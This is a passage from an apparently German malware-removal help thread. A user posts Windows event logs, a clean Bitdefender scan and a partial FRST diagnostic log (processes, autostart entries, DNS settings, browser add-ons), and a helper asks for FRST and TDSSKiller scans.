Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe". Error: (05/19/2017 01:51:22 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000 Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15 Ausnahmecode: 0xc0000409 Fehleroffset: 0x000eb802 ID des fehlerhaften Prozesses: 0x33fc Startzeit der fehlerhaften Anwendung: 0x01d2d0963aa49603 Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll Berichtskennung: 5e8a5ef4-440c-434d-91c0-338b626dcfb0 Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Error: (05/18/2017 09:09:27 PM) (Source: SideBySide) (EventID: 33) (User: ) Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe". Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden. Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe". Error: (05/18/2017 09:09:09 PM) (Source: SideBySide) (EventID: 33) (User: ) Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe". Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden. Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe". 
Error: (05/18/2017 09:06:26 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0x2304
Startzeit der fehlerhaften Anwendung: 0x01d2d009d6f7143d
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: 3df2ca2e-39a1-4eeb-abcd-e899ccd508a4
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (05/17/2017 09:21:29 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0x1b10
Startzeit der fehlerhaften Anwendung: 0x01d2cf42c69a45ef
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: ea7d32bf-5e80-458b-9d7a-442387dd0ab9
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (05/17/2017 09:14:32 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe". Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden. Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (05/17/2017 09:11:31 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0x1894
Startzeit der fehlerhaften Anwendung: 0x01d2cf4162996d04
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: 4380628c-e8f1-4062-8c7c-6a315d1a7271
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Systemfehler:
=============
Error: (05/19/2017 01:51:19 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (05/19/2017 01:51:19 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (05/18/2017 09:06:22 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (05/18/2017 09:06:22 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (05/17/2017 09:21:25 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (05/17/2017 09:21:25 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (05/17/2017 09:21:08 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "SDWSCService" wurde aufgrund folgenden Fehlers nicht gestartet: Ein erforderliches Zertifikat befindet sich nicht im Gültigkeitszeitraum gemessen an der aktuellen Systemzeit oder dem Zeitstempel in der signierten Datei.

Error: (05/17/2017 09:21:08 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "RtNdPt630" wurde aufgrund folgenden Fehlers nicht gestartet: Das System kann die angegebene Datei nicht finden.

Error: (05/17/2017 09:21:06 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet: Die Anforderung wird nicht unterstützt.

Error: (05/17/2017 09:11:28 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

CodeIntegrity:
===================================
Date: 2017-05-19 14:42:06.322
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2017-05-19 14:42:06.321
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2017-05-19 14:42:06.311
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2017-05-19 14:42:06.309
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2017-05-19 14:24:55.328
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00119_011\avcuf64.dll that did not meet the Microsoft signing level requirements.

Date: 2017-05-19 13:56:04.713
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2017-05-19 13:51:23.446
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00119_011\avcuf64.dll that did not meet the Microsoft signing level requirements.

Date: 2017-05-19 13:51:23.415
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00119_011\avcuf64.dll that did not meet the Microsoft signing level requirements.

Date: 2017-05-18 22:49:46.723
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00119_011\avcuf64.dll that did not meet the Microsoft signing level requirements.

Date: 2017-05-18 22:49:46.684
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00119_011\avcuf64.dll that did not meet the Microsoft signing level requirements.

==================== Speicherinformationen ===========================

Prozessor: Intel(R) Core(TM) i7-4790 CPU @ 3.60GHz
Prozentuale Nutzung des RAM: 30%
Installierter physikalischer RAM: 8127.12 MB
Verfügbarer physikalischer RAM: 5651.35 MB
Summe virtueller Speicher: 14271.12 MB
Verfügbarer virtueller Speicher: 11138.57 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:237.69 GB) (Free:109.28 GB) NTFS
Drive d: () (Fixed) (Total:931.51 GB) (Free:620 GB) NTFS
Drive e: (User Manual) (CDROM) (Total:0.19 GB) (Free:0 GB) CDFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 238.5 GB) (Disk ID: 83B6EBCC)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=237.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: EA468D08)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

==================== Ende von Addition.txt ============================

Code:
BitDefender Log File
Product : Bitdefender Internet Security 2017
Scanning task : Vollständiger System-Scan
Log date : Freitag, 19. Mai 2017 15:18:56
Log path : C:\ProgramData\Bitdefender\Desktop\Profiles\Logs\dcf483c4-26d0-4e6f-ba28-6a53a00adae1\1495198083_1_01.xml
Scan Paths:
Path : C:\
Path : D:\
[-]Scan Results
[-]Objects that were not scanned:
Object Path Reason Final Status
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/Tools/RAPIDCollectLogs/RAPIDCollectLogs.bat Password-protected Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/Tools/RAPIDCollectLogs/README.txt Password-protected Not scanned (file was password-protected)
[-]Detailed Scan Summary
[-]Basic
Scanned items : 2328487
Infected items : 0 (no infected items have been detected)
Suspicious items : 0 (no suspected items have been detected)
Resolved items : 0 (no threats have been detected during this scan)
Unresolved items : 0 (no issues remained unresolved)
[+]Advanced
[-]Scan Options
[-]Target Threat Types:
Scan for viruses : Yes
Scan for adware : Yes
Scan for spyware : Yes
Scan for applications : Yes
Scan for dialers : Yes
Scan for rootkits : Yes
Scan for keyloggers : Yes
[-]Target Selection Options:
Scan registry keys : Yes
Scan cookies : Yes
Scan boot sectors : Yes
Scan memory processes : Yes
Scan archives : Yes
Scan runtime packers : Yes
Scan emails : Yes
Scan all files : Yes
Heuristic Scan : Yes
Scanned extensions : none configured
Excluded extensions : none configured
[-]Target Processing:
Default primary action for infected objects : None
Default secondary action for infected objects : None
Default primary action for suspicious objects : None
Default secondary action for suspicious objects : None
Default action for hidden objects : Disinfect
Default action for password-protected objects : Log as not scanned
[-]Scan engines summary
Number of virus signatures : 8811655
|
21.05.2017, 19:44 | #3 |
/// TB-Ausbilder | Trojan, adware or something else?
My name is Matthias and I will help you clean up your computer. To make the cleanup as effective and fast as possible, I ask you to observe the following notes:
Please work through all steps one after another in the given order and post all log files in CODE tags: How it works: Posting in CODE tags. Attaching the log files, or even packing them into a ZIP, RAR or 7Z archive beforehand, makes your helper's work massively harder, unless of course the file would otherwise be too large for the forum. To put the log files into a CODE box, proceed as follows:
Thank you for your cooperation!
Step 1
Please download the matching version of Farbar's Recovery Scan Tool to your desktop: FRST 32-Bit | FRST 64-Bit (If you are not sure: download both versions, or check under Start > Computer (right-click) > Properties)
Step 2
Please download TDSSKiller.exe and save this file on the desktop
Please post with your next reply
|
21.05.2017, 20:13 | #4 |
| Trojan, adware or something else?
Hello Matthias, I am David. Thank you very much for your support. Attached are the requested logs. Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 20-05-2017 durchgeführt von Dino (Administrator) auf **** (21-05-2017 21:04:57) Gestartet von D:\Dino\Downloads Geladene Profile: Dino (Verfügbare Profile: Dino) Platform: Windows 10 Pro Version 1703 (X64) Sprache: Deutsch (Deutschland) Internet Explorer Version 11 (Standard-Browser: FF) Start-Modus: Normal Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Prozesse (Nicht auf der Ausnahmeliste) ================= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.) (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe (AMD) C:\Windows\System32\atiesrxx.exe (AMD) C:\Windows\System32\atieclxx.exe () C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe () C:\Windows\SysWOW64\ASGT.exe (ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe (Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe (ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe (Bitdefender) C:\Program Files\Bitdefender Agent\ProductAgentService.exe (DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe (ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AI Suite III\AISuite3.exe () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe (ASUS) C:\Program Files (x86)\ASUS\GPU Tweak\Monitor.exe (Microsoft Corporation) C:\Windows\System32\smartscreen.exe (Advanced Micro Devices, Inc.) 
C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe () C:\Program Files (x86)\ASUS\AI Suite III\AsusMiniBar.exe () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeHost.exe (Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (Microsoft Corporation) C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe (Spotify Ltd) C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe (Samsung) C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe (CANON INC.) C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe (Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe () C:\Program Files (x86)\Drakonia Configurator\hid.exe () C:\Program Files (x86)\Drakonia Configurator\trayicon.exe (Samsung Electronics.) C:\Program Files (x86)\Samsung\Samsung Magician\Samsung Magician.exe (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe (AO Kaspersky Lab) D:\Dino\Downloads\tdsskiller.exe (AO Kaspersky Lab) C:\Users\Dino\AppData\Local\Temp\{F74CDBD7-0132-474B-A4A1-3396D3D0D72B}\{F7FBBE79-94C0-4F7E-B4EF-32EDEA81ED75}.exe (Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.15063.0_none_1a733a82001933cc\TiWorker.exe ==================== Registry (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.) 
HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation) HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8466136 2015-04-30] (Realtek Semiconductor) HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation) HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [438888 2014-01-15] (CANON INC.) HKLM-x32\...\Run: [PDFPrint] => C:\Program Files (x86)\PDF24\pdf24.exe [210432 2016-07-05] (Geek Software GmbH) HKLM-x32\...\Run: [GamingMouse] => C:\Program Files (x86)\Drakonia Configurator\hid.exe [248832 2013-10-29] () HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Run: [Spotify Web Helper] => C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-02-19] (Spotify Ltd) HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Run: [SmartSwitchPDLR.exe] => C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe [1037992 2017-02-07] (Samsung) HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\MountPoints2: {ab244902-eb0d-11e4-8257-806e6f6e6963} - "E:\autorun.exe" GroupPolicyScripts-x32: Beschränkung <======= ACHTUNG ==================== Internet (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.) 
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 Tcpip\..\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}: [NameServer] 82.163.143.157 82.163.142.159 Tcpip\..\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}: [DhcpNameServer] 82.163.143.157 Tcpip\..\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}: [NameServer] 82.163.143.157 82.163.142.159 Tcpip\..\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}: [DhcpNameServer] 82.163.143.157 Tcpip\..\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}: [NameServer] 82.163.143.157 82.163.142.159 Tcpip\..\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}: [DhcpNameServer] 82.163.143.157 Tcpip\..\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}: [NameServer] 82.163.143.157 82.163.142.159 Tcpip\..\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}: [DhcpNameServer] 192.168.0.1 Internet Explorer: ================== HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://google.de/ BHO: Bitdefender-Geldbörse -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-04-24] (Bitdefender) BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.) BHO: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery64.dll [2015-01-23] (Ghostery, Inc.) 
BHO: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus64.dll [2015-02-25] (Eyeo GmbH) BHO-x32: Bitdefender-Geldbörse -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-04-24] (Bitdefender) BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.) BHO-x32: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery.dll [2015-01-23] (Ghostery, Inc.) BHO-x32: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus32.dll [2015-02-25] (Eyeo GmbH) Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.) Toolbar: HKLM - Bitdefender-Geldbörse - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-04-24] (Bitdefender) Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.) 
Toolbar: HKLM-x32 - Bitdefender-Geldbörse - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-04-24] (Bitdefender) FireFox: ======== FF ProfilePath: C:\Users\Dino\AppData\Roaming\Mozilla\Firefox\Profiles\rcgkbgt3.default-1489247668614 [2017-05-21] FF Homepage: Mozilla\Firefox\Profiles\rcgkbgt3.default-1489247668614 -> google.de/ FF HKLM\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff FF Extension: (Bitdefender Wallet) - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff [2017-05-01] FF HKLM\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext FF Extension: (Bitdefender Antispam Toolbar) - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext [2017-01-19] [ist nicht signiert] FF HKLM-x32\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff FF HKLM-x32\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_25_0_0_171.dll [2017-05-12] () FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_171.dll [2017-05-12] () FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-09-16] (Intel Corporation) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-09-16] (Intel Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-01] (Google Inc.) 
